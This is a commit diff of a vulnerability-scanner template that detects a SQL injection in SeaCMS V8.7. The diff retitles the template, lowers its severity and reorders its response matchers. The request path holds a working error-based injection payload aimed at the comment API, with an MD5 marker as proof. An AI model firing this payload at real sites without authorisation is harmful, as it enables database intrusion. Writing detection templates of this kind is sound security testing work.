Update seacms-sqli.yaml
parent
4e8eb2adc8
commit
c3e409cff5
|
@ -1,26 +1,26 @@
|
||||||
id: seacms-sqli
|
id: seacms-sqli
|
||||||
info:
|
info:
|
||||||
name: Seacms Sqli
|
name: SeaCMS V8.7 SQL Injection
|
||||||
author: ritikchaddha
|
author: ritikchaddha
|
||||||
severity: critical
|
severity: high
|
||||||
tags: seacms,sql,seasql
|
|
||||||
description: Sea CMS V8.7 Vulnerability
|
|
||||||
reference:
|
reference:
|
||||||
- https://www.uedbox.com/post/54561/
|
- https://www.uedbox.com/post/54561/
|
||||||
|
tags: seacms,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
|
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
|
||||||
|
|
||||||
redirects: true
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "6f7c6dcbc380aac3bcba1f9fccec991e"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "6f7c6dcbc380aac3bcba1f9fccec99"
|
|
||||||
part: body
|
|
||||||
|
|
Loading…
Reference in New Issue